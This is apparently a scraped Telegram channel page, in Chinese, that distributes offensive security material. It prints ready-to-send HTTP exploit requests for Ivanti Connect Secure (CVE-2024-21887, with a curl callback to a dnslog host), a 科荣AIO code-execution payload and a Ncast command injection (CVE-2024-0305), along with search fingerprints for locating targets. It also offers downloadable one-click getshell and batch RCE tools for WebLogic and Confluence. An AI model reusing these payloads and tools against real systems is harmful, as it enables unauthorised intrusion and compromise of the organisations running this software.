NEW BOT Телеграм, страница

踹哈公寓 pinned Deleted message

11:38

Ivanti Connect Secure远程命令注入漏洞(CVE-2024-21887)

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36Connection: closeAccept-Encoding: gzip, deflate

👍3🥰2

1.7K views09:15

踹哈公寓

👍6

1.65K views01:31

踹哈公寓

1.55K views07:19

踹哈公寓

科荣AIO管理系统远程代码执行漏洞

body="changeAccount('8000')"

POST /UtilServlet HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 324operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field

👍3

1.71K views07:35

踹哈公寓

https://mp.weixin.qq.com/s/ubFkPzipVWKlK88oDzpXNw?search_click_id=15125600405144015039-1705724216888-7485795479

1.56K views04:18

踹哈公寓

1.65K views11:38

踹哈公寓

1.57K views01:24

踹哈公寓

CVE-2024-0305 Ncast 平台RCE

icon_hash="-1253433910"

POST /classes/common/busiFacade.php HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 98Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}

1.66K views02:40

踹哈公寓

js攻击面拓展，正则提取JavaScript中url信息工具，可检验敏感参数，接口和挖掘未授权漏洞，手法神必备

https://github.com/BishopFox/jsluice
https://github.com/ttstormxx/jjjjjjjjjjjjjs
https://github.com/InitRoot/BurpJSLinkFinder
https://github.com/gh0stkey/HaE
https://github.com/RetireJS/retire.js

👍1😁1🤔1

1.95K views02:43

踹哈公寓

Channel photo updated

10:49

踹哈公寓

Channel name was changed to «_3.1.6_linux_amd64»

10:49

踹哈公寓

qq黑客nday批量神入侵国内企业备案站，修改首页并留下qq，死亡buff叠得最多的一集

我中午看到了就发到tg群了，不知道群里哪edusrc的又扒拉到了教育漏洞报告平台，引了波大流，qq微步微信还有tg都在传
只能说比较符合我对于qq黑客的刻板印象，nday批量无脑梭，梭完不交src要挂个炫酷黑页狠狠装逼再留个qq号，生怕警察叔叔找不到自个。这位多梦琪兄的qq空间更是主打一个自己记录犯罪证据。打批量确实太让容易让人产生自己分外无敌超级黑客的错觉了。只能说你进了局子之后大伙会给你唱一等情事的

😁6👍2

1.94K viewsedited 09:08

踹哈公寓

🤣5

1.89K views09:45

踹哈公寓

Atlassian Confluence远程代码执行漏洞（CVE-2023-22527）

👍1

1.73K views12:04

踹哈公寓

CVE-2017-3506-main.zip

96.5 KB

weblogic远程代码执行漏洞一键getshell工具

1.68K views02:20

踹哈公寓

Java.V1.7 (1).zip

165.9 KB

java反序列化综合利用工具

1.66K views02:55

踹哈公寓

Conflence rce 批量扫描脚本

1.71K views08:02

踹哈公寓

atlassian-confluence-text-inline-rce.py

1.3 KB

1.69K views08:02

踹哈公寓

审计中很多时候遇到的，为什么我跟进函数和变量都没问题，想post传参调用shell_exec导致rce的时候报了403呢

一般这种情况都是属于后台rce，其他地方给你写个什么if(!isset($_SESSION['isAdmin']) 用个请求头里的参数鉴权，没有登录前台直接post敏感目录就返回403状态码。可以扒拉其他文件找下check User Permission这些字眼，多半就是后台洞，调用本身是没问题的

🤔2

1.8K views10:09

About

Blog

Apps

Platform